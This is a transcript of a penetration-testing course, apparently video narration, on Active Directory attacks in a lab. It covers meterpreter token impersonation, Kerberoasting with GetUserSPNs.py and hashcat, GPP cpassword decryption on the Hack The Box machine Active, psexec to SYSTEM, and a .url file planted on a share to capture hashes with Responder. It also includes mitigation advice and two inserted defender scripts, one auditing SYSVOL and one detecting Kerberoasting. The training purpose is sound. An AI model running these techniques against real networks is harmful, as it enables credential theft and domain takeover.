Okay, so now we have the meterpreter session. We could do all the fun stuff that we already know about, right? We can do a hashdump, we could say getuid, we can make sure we're SYSTEM, we could say sysinfo, get the system info: we're on the right machine, right architecture, right everything. This is great. Now there are a few things that we can do in here. One is we can go ahead and load a tool, and if you type load and double tab, there's a few different things that we can use in here. Now we can load the tool that we're going to use, which is incognito. We can also use kiwi, which is a tool similar to mimikatz, which is made for dumping passwords, and we're going to talk about mimikatz here very, very soon. We could also load PowerShell. I love this feature, because sometimes if we get into a shell and we try to load PowerShell, like if we go into a shell and we just say powershell, execution policy bypass, whatever, and try to run that, it doesn't always run. This one's nice and neat for us; it's not always like that. So we're going to go ahead and cancel this or exit out of this channel, but we can load PowerShell into this and inject PowerShell as well, so these different features here are really nice.

But for this one I'm going to go ahead and load the incognito feature, and if we type help, the last thing that we loaded is always at the bottom, so if you ever want to see that, down here: Incognito commands. Now I've had incognito come up on interviews before, so this is a special one to note, and just to understand what token impersonation is and why it's important. So we have the ability here to impersonate a token. Once we have a token impersonated we can try to add a user, add a group, add local groups; we can do all kinds of fun stuff. For this example we're just going to go ahead and just try to impersonate a user, okay? And I'm going to go ahead and just list the tokens, and I'm going to do a -u. You could do it by -u or -g for groups; I always like to do it for -u. And you can see sitting on this machine here is MARVEL\administrator. So if we want to impersonate this person, all we have to say is impersonate_token, and then we're going to go ahead and just say MARVEL\\administrator, just like that. You want two backslashes because of character escaping. Now we've impersonated this user. Go ahead and type shell, whoami, and you see now we are MARVEL\administrator.

So one thing to know. Let's Ctrl+C, exit out of this. We can go ahead and say, like, you want to run hashdump now. It's going to have issues; it's going to say access is denied, because we're not actually running as the SYSTEM of the machine. So if you're ever in this situation, all you have to do is type rev2self, so you're going to revert to your old self, who you came in as, and then now you can run hashdump again and it'll work. So let's do one more proof of concept here. You saw that the administrator was available, and for you it might have been your other user, right? It's whoever is logged in currently; I didn't instruct you with who to log in as.
So on my Windows 10 machine right now I've got the MARVEL administrator logged in. Let's go ahead and just sign in with fcastle and let's just put in Password1, get Frank all logged in here, and get your other user logged in, whoever it is. If you had somebody you impersonated, go ahead and impersonate a different user here. So now we can come into this again and we can say list_tokens -u for user, and guess who just showed up: Frank Castle. Why? This is a delegate token. Remember, delegate tokens are on login or RDP sessions, so we had to log in on this computer. Now we've got this token. This token exists until the computer is rebooted; we can impersonate this user until the computer is rebooted. So we can go ahead and say impersonate_token and say MARVEL\\fcastle, like this. Should work. Go ahead and say shell, whoami, and guess what, now we're Frank Castle. This one is so cool. I love this attack.

So that's it. I just want you to get the feel for what you're capable of doing. We just took a user that just happened to have left a token behind, and this happens a lot. Think of an account or a server that you might log into or get access to, and there is a domain admin who logged into that computer, and servers don't get rebooted that much. So if there's a domain admin on that computer and they don't reboot very often, that token's sitting there until they reboot. So it's just moving laterally machine to machine until you find that way to escalate, and this is a potential way to escalate. So that's it. We're going to move on to talk about the mitigation strategies for this, and then we're going to talk about Kerberoasting, which is one of my favorite attacks. So I'll go ahead and catch you in the next video.

Quickly, let's talk about the token impersonation mitigation strategies. So with this we can limit user and group token creation permissions. That one's a little tricky; it will not fully prevent everything, I don't believe, not in my opinion. The better idea here, in the beating down of some of the repetition that we're going to have here: account tiering. Very important. Your domain administrators should be logging into the machines that they need to access, which should only be domain controllers. If for some reason that domain administrator logs into a user computer or a server, and that user computer or server gets compromised, guess what? We can impersonate that token. If we compromise the domain controller, what do we need to impersonate the token for? We've already compromised that domain controller. So yes, we could still do a token impersonation attack on the domain controller, but there's no point there. But if we're somewhere else in the network, on a user or a server, a different server, then we can compromise that, become domain admin equivalent, and leverage that. So that's one. Two, local admin restriction comes into play yet again. If users are not local admins on their computers, we cannot get a shell on that computer with their account. That prevents us from getting onto the computer and utilizing this kind of attack. So we need to have account tiering, we need to have local admin restriction in the network. And when I say account tiering as well, it should be noted that users typically have two accounts when we have account tiering. You might have Bob, and then you might have Bob-a. So Bob will have his everyday regular user account, and then when he wants to go access the domain controller he's going to log in as Bob-a, which stands for admin, and he's only going to log in on the domain controller and isolate his accounts with this tiering. So that way, anywhere else that Bob has access or privilege to, you're not going to be able to get to the domain controller if you compromise Bob's regular user account, and typically the domain admin accounts have longer password policies and are more strict with their permissions. So something to think about in terms of defeating this, and it's just beating a dead horse with a lot of this, right? Like, just a lot of repetition on some very simple policies, and if these policies are in place, which in most networks they're not, then you can stop an attacker with a lot of attacks. So that's it for that. We're going to go ahead and move on to Kerberoasting now, so I will see you over in the next video.

Let's talk Kerberoasting. So in order to talk Kerberoasting, we have to understand how Kerberos itself works. Now there is this great, great infographic here that will tell us how these things work. So here we have a domain controller, okay, and this domain controller is also known as a key distribution center, and we can call that a KDC. Here we also have our user. Now our user is going to need to authenticate to the domain controller. When they do that, they're going to say, hey, I want to request what is known as a ticket granting ticket. I'm going to provide my NTLM hash and I'm going to request that ticket from you. Now the domain controller is going to send back the ticket granting ticket, and it's going to encrypt that ticket with the Kerberos ticket granting ticket hash, okay? What's important here is this KDC is holding the keys, right? So we have to authenticate with the KDC, that sends it back here, and now we have a ticket granting ticket. How did we get this ticket granting ticket? We supplied an NTLM hash. What does that mean? We have a username and a password. That's it. Any valid user, doesn't have to be admin, doesn't have to be anything, any valid user gets this ticket. This is how Kerberos works; this is the authentication. So we have Frank Castle, we have Password1, we have a valid ticket granting ticket.

So from here, now let's say we have an application server. This could be SQL, this could be antivirus, it could be whatever you want the application to be; we just have a service that we're trying to access. So this service here has what is called an SPN, that is a service principal name, and that's going to come into play here in just a second. But in order to access this service we have to first request a ticket granting service ticket, or this is a TGS, okay? So we're going to request this TGS, and how do we request this? Well, we present our TGT. So we've already got our TGT, our ticket granting ticket. We're going to request a service ticket from the server. Well, the server knows the server account hash, right, and it's going to encrypt that and send it back. The server does not know, the KDC or the server here does not know, if we have access to the server or not. So it's just going to provide back to us the TGS with the server account hash. This is where Kerberoasting stops. However, let's continue. In order to authenticate to that server in the real world, what we would do is we would present that TGS to the application server, and that would then decrypt it using its own server hash, and it would say yes, you have authentication, you are the user that is allowed on this, or no, and then it's going to send back and say yes or no. We don't need to ever send that out. This is not important. It's important to understand what's happening and why this happens, but the important part to understand here is we have a valid user account, which gives us a ticket granting ticket, steps one and two. With that ticket granting ticket then we can request a service ticket for a service. That service ticket is going to be encrypted with the server's account hash. Why does that matter? Well, guess what, it's a hash. We can decrypt the hash; we can try to crack the hash. So we can run a tool, it's called GetUserSPNs.py, guess where it's from, Impacket. Impacket's awesome. And we just say marvel.local, Frank Castle, Password1, we specify the domain controller IP, and we request. So we're going to request this service ticket, right, and guess what's going to happen: we're going to get this ticket granting service ticket here. It has the hash here that it's encrypted with, and we're just going to copy this hash and try to crack it. So we're going to put this into hashcat, this big long hash that we get back, and we're going to crack it pretty easily. So that's what we're going to do.

Again, quick refresher, just to go back: we have our ticket granting ticket. We request that from the KDC. We get that because we have a known user account; does not have to be a domain administrator account, known user account. So once we get credentials we can attempt Kerberoasting. From there we request this ticket granting service ticket, and it's going to send that back to us, and it's going to say here you go, I'm going to encrypt it with the service hash, and then we don't ever have to present here. We just take it and we try to crack that. So let's go ahead and do this hands-on, and you'll see this come up again a couple times. So let's go ahead and move on to the next video.

Let's pull off this Kerberoasting attack. So we're going to use GetUserSPNs. So GetUserSPNs, you should be able to tab complete that, and now again all we need is that username and password from a domain account. So marvel.local, we're going to say fcastle here and Password1. We need to know the domain controller IP, so we're going to specify that with -dc-ip, like this, and we're going to say 192.168.57.140, or whatever your IP address is, and do a -request. There you go. So already, very quick is how this happens. It just comes down and it provides us the hash here. So we requested that TGS again, and we can take a look at this, and you can see that what came down was a SQL service, and remember we did set that up, and here it's going to give us this krb5tgs hash. So go ahead and copy this, and what we're going to do is we're going to put this, I'm going to put this into my hashes4, same one I've been using, and save it. So we could do a quick hashcat to find the module. We could do --help and we can do a grep on Kerberos like this, and we are after Kerberos 5 ticket granting service, TGS, so 13100 here. So what we'll do is we'll come into here and we'll just say, similar to before, hashcat64.exe, module of 13100, hashes4.txt, and then we'll do a rockyou.txt. Go ahead and hit enter after putting a capital O to optimize, and this should just take a second here as well. So we're going to let this run, and then I'm going to give you a little spiel on this password.

So this password is going to crack, and it's going to crack as MYpassword123#, right, and this is a, what, 2, 6, 10, 14 character password. So remember how I said that even though 14 characters is like the minimum I recommend, these passwords that use common wordage and just look like this, it's not safe. This is a 14 character password and it fell so easily. It's in rockyou.txt. rockyou was the base crack list, right? A good crack list can still crack a 14 character password, and like I said, I've cracked a 19 character password before because it was a Bible verse. So if it's something well known or easily guessable like this and uses dictionary words, chances are it's going to fall. So I just wanted to harp on that, but the bigger point is we have found the SQL service password. This is the SQL service domain password here, and we already knew what it was because we discovered it earlier, but this is a domain admin account because it was set up incorrectly. Your service accounts should not be domain admin accounts, but that happens all the time. So we look for these accounts with Kerberoasting, we try to crack these passwords, and then we utilize these to access the domain controller, access new areas, even lateral movement, but this is a lot of the times considered vertical movement, because it gets us right into a domain controller when these have incorrect permissions set up. So that's it. This is one of the most common attacks that you will see in a network. Once you get a credential at all, you can try Kerberoasting and see if you can't get to a password crack and leverage that. So let's go ahead and talk about mitigations before we move on to some other attacks.

All right, mitigation. So just a couple options here. Now Kerberoasting, this is a feature of Windows, right? We're abusing a feature, so there's nothing that you can really do to defend against this except having strong passwords for your service accounts. Very strong passwords, not 14 characters like we cracked, like 30 characters or more; you know, the longer the better. On top of that, least privilege. Do not make your domain accounts domain administrators, or do not make your service accounts domain administrators, right? Least privilege here. Too often we see service accounts running as domain administrator, and too often we see service accounts running with weak passwords. Combine those two and you're going to have a bad day as a network administrator. So that's it, pretty simple on the mitigation strategy. So from here we're going to talk about an older but yet still relevant attack, and this attack is called the cpassword attack, or a GPP attack. So we'll go ahead and see you in the next video when we talk about this and revisit Hack The Box.

Up next on the list is the GPP, or group policy preferences, attack, also known as MS14-025. So a quick overview: the group policy preferences allowed admins to create policies using embedded credentials. Now these credentials were encrypted and they were placed into an XML document, and they were stored in this type called cpassword. Now the cpassword was encrypted, as I said, and the key to this encryption was accidentally released, and so therefore we can decrypt it. Now this has been patched in MS14-025 and prevents issues going forward; however, it does not prevent previous issues. So what that means is if an admin has stored a group policy preference embedded credential before the patch was implemented, then this will still display a credential to us. Now most of the time these credentials are domain admin credentials and will allow us access to domain admin accounts. This is not going to come up that often, but it is still something that you should be checking for, because there are a lot of Server 2012 machines out there, for example, that this was not patched on, or has been patched but this was running on previously. So what we're going to do is we're going to cover how to do this, and it's actually kind of difficult to set up in the lab environment, so what we're going to do is we're actually going to use Hack The Box to attack this. Before we do that I am going to reference an article here. Now this article is by Rapid7, and I'm going to paste it down below, but this kind of shows you what GPP is and what the uses were, and you can see here that a password was stored, and if we scroll down quickly we can see that the password was stored in the SYSVOL. So as long as you have a user account, we can read that SYSVOL, and it says here any domain user. This is why this is a post-exploitation attack. Once we have a domain user we can attempt to read this SYSVOL. It's stored here in the cpassword, you can see it, and all we have to do is run gpp-decrypt, which is built into Kali, and it'll decrypt the password. Now there is this smb_enum_gpp here. This is a Metasploit module, and I really want you to write this down. This is how you would check for this. So say you have a shell in Metasploit; you can background that shell, run the smb_enum_gpp, or you can run the post module for GPP, and see if you can enumerate this and gain a username and password similar to this. Before, I have seen this come up in previous assessments, and this is always something that you should be checking for, even if it's older. So from here we're going to utilize Hack The Box. There's a machine on there called Active. We're going to use that, and it's got two great examples of what we just learned on here. So I'm going to challenge you once we get to the next video on solving half of the equation. We'll walk through the first half and talk about this GPP and see a live example of it. So I'm going to go ahead and catch you over in the next video when we explore this GPP attack.

So we're going to walk through a box called Active. Now Active relates to Active Directory. It's one of my favorite machines on Hack The Box because of this. So Active lives at 10.10.10.100, and I want you to go ahead and boot up your machine, log into Hack The Box if you're going to follow along. So this is going to be kind of a two-part video. The first part, I'm going to show you how we scan and enumerate this machine, what we're looking for when it comes to GPP, and then the second part is just going to be a bonus. We're going to actually have to privesc this machine, and we're going to figure out how we're going to privesc this machine based on an attack that we've already done in the past in this course. So once you're all loaded up here, go ahead and go into your terminal and get scanning. So this one lives at 10.10.10.100, and I'm just going to make this a quick scan, an nmap, and then we'll just do, I'm actually going to do a -T5 on 10.10.10.100, and this should pull back pretty fast on the ports, what we're going to be after. And so what we're going to do here is you can see that we are running a domain. So when we scan against a domain controller we expect to see something like 53 open, and that could be a router as well, but we also expect to see 88 open, because 88 is Kerberos and it's running Kerberos on that port. So that kind of tells us, along with LDAP and LDAP secure, or LDAP SSL. So now we kind of have an idea that this is probably a domain controller based on all the things that we're seeing here. So on top of this we have 445 open, so we want to enumerate 445 on this machine, and we're going to take a look at 445 for this attack. Why are we looking at 445? Because the attack involves utilizing SMB, and in SMB, when you connect to it, there are SYSVOL folders, right? Let's take a look; this will be easier. So we'll just say smbclient and we'll do a -L to list this out, and I'll go ahead and just say 10.10.10.100. We'll take a quick look at this and we'll try anonymous connection here, and you can see that there are different folders: there's the ADMIN$ folder, C$, IPC$, NETLOGON, Replication, SYSVOL, and Users. Now we can try to connect to each one of these, but it's going to deny us access to all of these. However, there is this Replication folder where we do have anonymous access, as no user, right? So we're just going to say Replication, enter this in, and we have access to this machine. And I'm kind of speeding along here just so that we can get through this and we can actually work on the machine itself, with the exploit itself, as opposed to working on methodology and why we're doing this. The exploit is more related to SMB than it is enumerating, so this isn't a walkthrough box more so than showing you the exploit.

So the way SYSVOL works is it's storing this Groups.xml file, and in that Groups.xml file is where you find that cpassword, and this is where that GPP, that group policy preferences, came into play. And so let's go ahead and, I'm going to turn prompt off, which is just going to, if I could type it, which is just going to tell us not to prompt when we tell it to download all of our files. So what I'm going to say is I want recurse on. So recurse on means it's going to download all the files that I tell it to. So if we ls here, you can see there's a bunch of different folders and files in here, and there's actually, you can see there's a Groups.xml, and this is kind of what we're going to be interested in. So what we're going to do is we're just going to say mget *, like this, and this is going to get all the files, and as we see these come across we can know if we're interested in anything. We see this GPE.INI, we see Groups.xml, a Registry.pol, GptTmpl.inf. So we're really interested in this Groups.xml, and this is something to note: Groups.xml is the file you're looking for when it comes to GPP. Now you don't have to do this again; there is the GPP enumerate when it comes to meterpreter, or if you want to use PowerShell, there are PowerShell scripts out there as well. I believe one is called Invoke-GPP, and that'll search through the SYSVOL for you as a user and look for this exploit. So in this situation I should note too that we had anonymous access to this Replication folder. That's not a realistic scenario. This is most definitely a post-exploit scenario where we have a user account; once we have that user account we'll be able to access that SYSVOL folder, okay?

So from here we see that we have this Groups.xml. So what I'm going to do is I'm actually going to go to Files, and we are here in active.htb. It should download to that, and we can just kind of look where it went. So it went Policies, 31B, so we're going to go to the 31B folder, and then we're going to go to Preferences, or MACHINE, Preferences, Groups, and there's the Groups.xml. So this is why I also did the mget *, so that we can see what came through and we don't have to just sit there and cd and navigate around just to see if there's something in a folder or not in a folder. It's much easier to just download everything and look through what comes through. So when we come into here and we open this up, you can see now that we have our cpassword. On top of this we have active.htb, which is the domain name, and we have SVC_TGS. Service ticket granting service, TGS, that should ring a bell, right? Ticket granting service. So this is the TGS account. So what are we going to do? We're going to copy this bad boy here, and we can go right into, let's just go ahead and go to a new tab, make this bigger, and we could just say something along the lines of gpp-decrypt, paste that in just like that, and look what happens: GPPstillStandingStrong2k18. So that's the password. Look how long this password is. It doesn't really matter, right? What matters here is that we are able to reverse or decrypt this GPP because we know the encryption. So here we now have a username and a password. We have active.htb\SVC_TGS and the password of GPPstillStandingStrong2k18.
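As an added defender-side example for the Groups.xml cpassword above (not code from the course and not gpp-decrypt), this script walks a SYSVOL tree and reports every Group Policy Preference item that still carries a cpassword attribute, with GPO GUID, file and account, so the item can be removed rather than decrypted. The sample tree it builds, the placeholder cpassword value and the SVC_TGS entry are constructed; the only real identifier is the Default Domain Policy GUID.

```python
"""Find Group Policy Preference items that still embed a cpassword.

Added example for this section; not the course's tooling and not gpp-decrypt.
It reports the leftovers (the MS14-025 case) so they can be deleted rather
than decrypting them. Point audit_sysvol() at a mounted copy of the domain's
SYSVOL share (path assumed), or run it on the constructed sample tree below.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can carry embedded credentials.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}
# Attributes that name the account in the different preference types.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")
GPO_GUID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def cpassword_items(xml_path):
    """Return (account, cpassword length) for every Properties element in
    xml_path that has a non-empty cpassword attribute."""
    hits = []
    try:
        root = ET.parse(xml_path).getroot()
    except ET.ParseError:
        return hits  # malformed file: nothing to report here
    for props in root.iter("Properties"):
        cpw = props.get("cpassword")
        if not cpw:
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
        hits.append((account, len(cpw)))
    return hits


def audit_sysvol(sysvol_root):
    """Walk a SYSVOL tree and collect every embedded-credential finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            gpo = GPO_GUID.search(path)
            for account, cpw_len in cpassword_items(path):
                findings.append({
                    "gpo": gpo.group(0) if gpo else "?",
                    "file": os.path.relpath(path, sysvol_root),
                    "account": account,
                    "cpassword_len": cpw_len,
                })
    return findings


# Constructed Groups.xml modelled on the one pulled from the Replication share;
# the cpassword value is a placeholder, not a real encrypted blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="PLACEHOLDER_CONSTRUCTED_NOT_A_REAL_BLOB" changeLogon="0"
      noChange="1" neverExpires="1" acctDisabled="0"
      userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""
# Constructed Drives.xml with no credential: must not be reported.
SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:">
    <Properties action="U" path="\\\\HYDRA-DC\\hackme" letter="H"/>
  </Drive>
</Drives>
"""
# Default Domain Policy GUID (a fixed, well-known value).
SAMPLE_GPO = "{31B2F340-016D-11D2-945F-00C04FB984F9}"


def build_sample_sysvol():
    """Create a throwaway SYSVOL-like tree and return its root path."""
    root = tempfile.mkdtemp(prefix="sysvol_sample_")
    prefs = os.path.join(root, "active.htb", "Policies", SAMPLE_GPO,
                         "MACHINE", "Preferences")
    for sub, fname, body in (("Groups", "Groups.xml", SAMPLE_GROUPS_XML),
                             ("Drives", "Drives.xml", SAMPLE_DRIVES_XML)):
        os.makedirs(os.path.join(prefs, sub), exist_ok=True)
        with open(os.path.join(prefs, sub, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in audit_sysvol(build_sample_sysvol()):
        print(f"{hit['gpo']} {hit['file']}: account {hit['account']} carries "
              f"a {hit['cpassword_len']}-char cpassword; remove it")
```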
So I'm going to pause the video here, or I'm going to actually cut the video off. This is going to be considered part one; part two is going to be a challenge to you. We can now go log in with this account, and you're going to find that when you log in with this account you are actually a lower level user. This account is not a high level user; this is not a SYSTEM, okay? So because this is not a system level user, what is an attack that we can run on this to try to escalate? And you can use anything and everything that has been taught to you so far. Once you think through it, if you find the answer, go ahead and attempt it. If you're just watching and not following along with the Hack The Box, that's okay as well; just go ahead and meet me in the next video and we'll cover this. So brief review as well: we are after the GPP, right, the Groups.xml. This is an older exploit. We're targeting Windows 2012, Server 2012, usually with these, and you're going to see these in environments. When you come across it, it's going to look pretty much like what I showed you. It's going to be something like this, where you either get the username and the password right off the bat with meterpreter, or you're going to run something along the lines of Invoke-GPP and you're going to try to search for that as well via PowerShell module. But this is what you're after, and this is what you're decrypting here with that password. So now we've got a username and password. How are we going to abuse this? I love this machine, so I'll meet you over in the next video with the solution.

Part two. Let's do this. So here we are. We have our user account and our password. Now what can we do? Well, we can try to get on an account. We can say something like, we can say, what, psexec.py, and we can say active.htb, and then it was actually forward slash SVC_TGS, like this, and then we can just copy this password, paste it here, and say @10.10.10.100.
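As an added defender-side counterpart to the Kerberoasting walkthrough earlier in this section (not code from the course or from Impacket), this script runs over constructed Windows Security event 4769 records, flattened to key=value lines the way a SIEM or Windows Event Forwarding pipeline might emit them, and flags what a GetUserSPNs.py -request run leaves behind: RC4 (etype 0x17) service tickets for user-style accounts, and one requester pulling several such tickets within minutes. The account names, service names and workstation address in the sample are constructed.

```python
"""Spot Kerberoasting-style TGS requests in Windows Security event 4769 data.

Added example for this section, not course or Impacket code. Assumes the 4769
fields have already been flattened into key=value lines (as a SIEM or Windows
Event Forwarding pipeline might do); the sample lines below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the ticket type hashcat mode 13100 cracks
AES256 = 0x12    # etype 18: what a healthy modern domain hands out


def parse_event(line):
    """Turn one flattened 4769 line into a dict with typed fields."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return {
        "time": datetime.fromisoformat(fields["TimeCreated"]),
        "requester": fields["TargetUserName"].split("@")[0].lower(),
        "service": fields["ServiceName"].lower(),
        "etype": int(fields["TicketEncryptionType"], 16),
        "status": int(fields["Status"], 16),
        "src": fields["IpAddress"],
    }


def is_roastable_target(service):
    """User-style service accounts are the roasting targets; machine accounts
    (trailing $) and krbtgt tickets are routine and excluded."""
    return not service.endswith("$") and service != "krbtgt"


def rc4_user_spn_requests(events):
    """Successful TGS requests for user-account SPNs issued with RC4, which is
    exactly the ticket GetUserSPNs.py -request asks for."""
    return [e for e in events
            if e["status"] == 0 and e["etype"] == RC4_HMAC
            and is_roastable_target(e["service"])]


def burst_requesters(events, window=timedelta(minutes=5), min_services=2):
    """Requesters that pulled >= min_services distinct user-account service
    tickets inside one window (any etype). Returns {requester: services}."""
    by_user = defaultdict(list)
    for e in events:
        if e["status"] == 0 and is_roastable_target(e["service"]):
            by_user[e["requester"]].append(e)
    flagged = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):
            services = {e["service"] for e in evs[i:]
                        if e["time"] - first["time"] <= window}
            if len(services) >= min_services:
                flagged[user] = sorted(services)
                break
    return flagged


# Constructed 4769 records: a routine morning for fcastle, then the roast.
SAMPLE_4769 = [
    # routine: AES ticket for the DC's machine account (file share access)
    "TimeCreated=2023-03-01T09:00:00|TargetUserName=fcastle@MARVEL.LOCAL"
    "|ServiceName=HYDRA-DC$|TicketEncryptionType=0x12|Status=0x0"
    "|IpAddress=192.168.57.105",
    # routine: TGT renewal against krbtgt, never a roasting target
    "TimeCreated=2023-03-01T09:00:30|TargetUserName=fcastle@MARVEL.LOCAL"
    "|ServiceName=krbtgt|TicketEncryptionType=0x12|Status=0x0"
    "|IpAddress=192.168.57.105",
    # the walkthrough: RC4 ticket for the SQL service account from the Kali box
    "TimeCreated=2023-03-01T09:01:10|TargetUserName=fcastle@MARVEL.LOCAL"
    "|ServiceName=SQLService|TicketEncryptionType=0x17|Status=0x0"
    "|IpAddress=192.168.57.139",
    # constructed second SPN requested two seconds later (same tool run)
    "TimeCreated=2023-03-01T09:01:12|TargetUserName=fcastle@MARVEL.LOCAL"
    "|ServiceName=svc_backup|TicketEncryptionType=0x17|Status=0x0"
    "|IpAddress=192.168.57.139",
    # a failed request (non-zero Status): no ticket was issued, so ignored
    "TimeCreated=2023-03-01T09:01:13|TargetUserName=fcastle@MARVEL.LOCAL"
    "|ServiceName=svc_web|TicketEncryptionType=0x17|Status=0x7"
    "|IpAddress=192.168.57.139",
]


def analyze(lines):
    """Parse flattened 4769 lines and return (rc4 hits, burst requesters)."""
    events = [parse_event(line) for line in lines]
    return rc4_user_spn_requests(events), burst_requesters(events)


if __name__ == "__main__":
    rc4, bursts = analyze(SAMPLE_4769)
    for e in rc4:
        print(f"RC4 TGS for {e['service']} requested by {e['requester']} "
              f"from {e['src']} at {e['time']:%H:%M:%S}")
    for user, services in bursts.items():
        print(f"{user} pulled {len(services)} service tickets in one window: "
              f"{services}")
```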
And see what happens. Nothing's writable, okay. So we have valid user credentials but not writable. Well, what is an attack we talked about very, very recently that we can use with user credentials? And the TGS might have tipped it off. What about Kerberoasting? Remember, the TGS is the service ticket. Well, when we say service ticket we think, well, maybe that's Kerberoasting; maybe we need to get a service here. So that's kind of a tip, and so we can do the GetUserSPNs, right, and we can say again, we could say active.htb and we say SVC_TGS, just like this, paste this one more time, and we'll do -dc-ip of the same box address, and then we'll just say -request, and then look what happens: this comes through. So let's go ahead and just make this a little bit bigger. I'll actually blow this up completely, and now you can see that we have a service ticket here. So I'm going to copy this service ticket, and I'm actually going to open up my hashcat folder live here, open up hashes4, and we have our old one. I'm just going to paste that in, save this ticket, and I'm going to open up a command prompt, and we're going to do this together. So I'm opening up my command prompt and we're going to try to crack this. So I'm going to cd into my Desktop\hashcat, and then it's hashcat64.exe, a module of 13100, hashes4.txt, and rockyou.txt with the capital O, just like that. This should be all familiar; refreshers I'm going through just a little bit faster. Hit enter and let's see what happens. Should only take a second, and look what came through: Ticketmaster1968 is our password. We have successfully Kerberoasted this account, and you can see here that it is the Administrator account. Oh, that's lovely. I love when the Administrator is a service account. So now let's just do administrator, like this, paste this in here, and try psexec.py one more time. It found the writable share of ADMIN$, and now we have whoami, NT AUTHORITY\SYSTEM, hostname, Active, or DC, and we took down this box easy as that.

So hopefully this was a fun challenge. Hopefully you actually tried it; if not, just get your wheels spinning. If you have a credential, and it doesn't have to be a credential that can get you onto a machine, we could have a situation where this is a low level user, or they just don't have local admin on their machine, so psexec, smbexec, wmiexec, none of those are working, but we can try attacks like Kerberoasting on the network, or we can try attacks like the GPP password attack and see if we can't find stored credentials somewhere. So these are great attacks that we can try that are just default Windows kind of stuff. So from here we're going to go ahead and talk a little bit about mimikatz. We'll talk about a couple different ways we can utilize it in the network and wrap up this section. So we're almost through Active Directory. I feel sad; it feels like it's coming to a close, but I'm very excited to walk through mimikatz next. So let's go ahead and move on to that video.

Okay, so I want you to imagine a scenario where you have compromised a user, and this user has any sort of share access, so any sort of file share access. We can utilize that access to capture more hashes via Responder, go back and try to crack those hashes, get the passwords, and possibly get a different user, or maybe a user with more access. So this does require a compromised user account, or potentially an open file share. So if you happen to find an open file share for some reason, you can access it and put something in there, or put a file in there, that works as well. So what we're going to do is a play on what used to be called an SCF attack. The SCF attack still kind of works, but it's not as good as what is called a URL attack, and it's the same premise, same idea. I'm going to put a link in the description below, or the resources, you can go read up on these attacks and see there's all kinds of different authentication attacks out there where you can utilize social engineering, like you can use Microsoft Word, you can use Outlook, and different ways to get people to open files or certain things that will then trigger a hash back to you in Responder. So what we're going to do is we're going to first create the file, and then we're going to come back and run Responder and test it out.

So I am in my Windows 10 machine. I'm logged in as Frank Castle in here. I've got a Notepad open, so if you want to open up a Notepad and type this out, you're more than welcome to. If you just want to watch a demonstration, that's fine too. If you want to pause the video, go ahead and type this out; absolutely fine. So basically what we have here is [InternetShortcut], URL=blah, WorkingDirectory=blah. None of this really matters as long as the syntax is here. The only thing that truly matters, okay, is this IP address. This IP address is going to be your attacker IP. So what we're going to do is we're going to point this at us, so that way we can capture the hash. What's going to happen here is we're going to save this file, and we're going to save this file to a share. So remember we created that hackme share in our HYDRA-DC. So I went ahead and put this in here. So what you do is you go File, Save As once you've got it all typed out, and I'll also put this in a code format down below as well, so if you want to just copy and paste it you can do that. But what you want to do is you can come in here and you can just click on all files and say you wanted to name it something. We can name it with quotes around it. We'll just call it like @test, and then you could call it .url, okay? You want to have two things here: the @ symbol, or a squiggly will work as well, like a little tilde like that, and you want to also have the .url at the end of it. The tilde or the @ symbol puts this at the top, okay? So what's happening is when the user comes and navigates to this share folder, this will be at the top of the folder. So at the top of the folder it ensures that it loads. If they have a large file share and they have to scroll through it and it doesn't load, then they might not see the file, doesn't trigger, doesn't automatically send the hash. We want to automatically send the hash; we want to place this at the top. Now what you can do with this is you can create something in here, instead of writing something, maybe it's like a finance folder, it could just be something where it's just called like Q4 financials, or something that would be relevant to the folder of where it's at. If it's like a printing share, it could just be like, looks like something else that would be, you know, a PDF or print job or something out there. So you want to kind of social engineer a little bit, but if you drop this file nobody's really going to do anything. If we open it up it's not going to really do much; it's just going to go to whatever. You could make this go to Google if you wanted to; like, you could change the directory to whatever you wanted to. So with that being said, I'm going to go ahead and just cancel this, but what can happen here is we just want to save this in this directory, okay?

So, all said and done, we've got it saved. I'm on the Frank Castle machine. I'm going to go to This PC, get out of that folder, and then we're going to open up Responder, and all we're going to do is just do responder, we can do a -I eth0, and then a -v for verbose. Hit enter, we're listening. Here's our IP address, attacker machine. We're going to come in, we're just a user navigating to a folder, no big deal, oh my gosh, all these hashes just came through. It's the same thing repeated, don't worry about that, but you should have captured a hash here, and what is this? NTLMv2, okay. So you can copy this and you can send this off, and what else can you do with this? You can relay it as well. So if you're in a situation where you want to try relaying, maybe get access somewhere else, that is an opportunity for you as well. So this is a cool little feature where you can just dump a quick file in a file share, literally just a few words or a few lines in a text document essentially, and this will cause hashes to load like crazy for you. So something to think about when you compromise a machine, and go from there. So that is it for this video.

